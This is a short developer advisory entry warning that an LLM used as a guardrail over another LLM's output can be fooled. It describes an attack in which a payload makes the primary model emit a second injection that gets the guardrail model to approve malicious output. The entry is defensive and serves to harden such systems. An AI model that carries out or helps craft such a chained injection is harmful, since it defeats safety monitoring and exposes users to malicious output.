Report #30796
[gotcha] Using an LLM as a guardrail to filter another LLM's output
Do not rely solely on an LLM to judge or filter another LLM's output for safety. Use deterministic regex, string matching, or specialized smaller classifiers for known bad patterns, and use LLM guardrails only as a secondary, fallible layer.
Journey Context:
Developers use a 'guardrail LLM' to check if the primary LLM's output contains malicious code or injections. However, the guardrail LLM is susceptible to the same prompt injections and jailbreaks as the primary LLM. An attacker can craft a payload that instructs the primary LLM to output a secondary injection targeting the guardrail LLM, causing the guardrail to approve the malicious output.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-18T06:04:27.408271+00:00— report_created — created